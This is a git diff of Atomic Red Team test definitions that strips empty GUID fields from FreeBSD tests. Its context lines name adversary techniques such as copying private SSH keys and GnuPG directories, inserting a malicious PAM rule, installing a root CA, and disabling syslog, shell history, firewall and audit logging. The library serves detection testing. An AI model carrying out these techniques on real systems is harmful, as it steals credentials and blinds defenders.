for specifice commands we want to capture supported_platforms: diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index 32dc7100..a8e9976a 100644 
--- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -61,7 +61,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy Private SSH Keys with CP (freebsd) - auto_generated_guid: description: | Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command. supported_platforms: @@ -113,7 +112,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy Private SSH Keys with rsync (freebsd) - auto_generated_guid: description: | Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command. supported_platforms: @@ -167,7 +165,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy the users GnuPG directory with rsync (freebsd) - auto_generated_guid: description: | Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command. supported_platforms: diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index ebb5adc0..8c3a8c54 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -28,7 +28,6 @@ atomic_tests: name: sh elevation_required: true - name: Install root CA on FreeBSD - auto_generated_guid: description: | Creates a root CA with openssl supported_platforms: diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index 867db80e..896cab85 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -30,7 +30,6 @@ atomic_tests: cleanup_command: | sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - name: Malicious PAM rule (freebsd) - auto_generated_guid: description: | Inserts a rule into a PAM config and then tests it. diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 2d8a65a2..aa8ffe63 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml 
@@ -40,7 +40,6 @@ atomic_tests:
 name: sh
 elevation_required: true
 - name: Disable syslog (freebsd)
- auto_generated_guid:
 description: |
 Disables syslog collection
 supported_platforms:
diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1562.003/T1562.003.yaml
index a354b32e..d425611a 100644
--- a/atomics/T1562.003/T1562.003.yaml
+++ b/atomics/T1562.003/T1562.003.yaml
@@ -19,7 +19,6 @@ atomic_tests:
 #{evil_command}
 name: sh
 - name: Disable history collection (freebsd)
- auto_generated_guid:
 description: |
 Disables history collection in shells
 supported_platforms:
@@ -119,7 +118,6 @@ atomic_tests:
 cleanup_command: |
 export HISTCONTROL=$(echo $TEST)
 - name: Setting the HISTSIZE environment variable
- auto_generated_guid:
 description: |
 An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
@@ -157,7 +155,6 @@ atomic_tests:
 cleanup_command: |
 export HISTFILE=$(echo $TEST)
 - name: Setting the HISTFILE environment variable (freebsd)
- auto_generated_guid:
 description: |
 An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index b61def59..7f039135 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -113,7 +113,6 @@ atomic_tests:
 ufw enable
 ufw status verbose
 - name: Stop/Start Packet Filter
- auto_generated_guid:
 description: |
 Stop the Packet Filter if installed.
 supported_platforms:
@@ -209,7 +208,6 @@ atomic_tests:
 { echo y; echo response; } | ufw delete 1
 ufw status numbered
 - name: Add and delete Packet Filter rules
- auto_generated_guid:
 description: |
 Add and delete a rule on the Packet Filter (PF) if installed and enabled.
 supported_platforms:
diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml
index 540718e3..2cc59018 100644
--- a/atomics/T1562.006/T1562.006.yaml
+++ b/atomics/T1562.006/T1562.006.yaml
@@ -38,7 +38,6 @@ atomic_tests:
 name: bash
 elevation_required: true
 - name: 'Auditing Configuration Changes on FreeBSD Host'
- auto_generated_guid:
 description: |
 Emulates modification of auditd configuration files
 supported_platforms:
@@ -98,7 +97,6 @@ atomic_tests:
 name: bash
 elevation_required: true
 - name: 'Logging Configuration Changes on FreeBSD Host'
- auto_generated_guid:
 description: |
 Emulates modification of syslog configuration.
 supported_platforms:
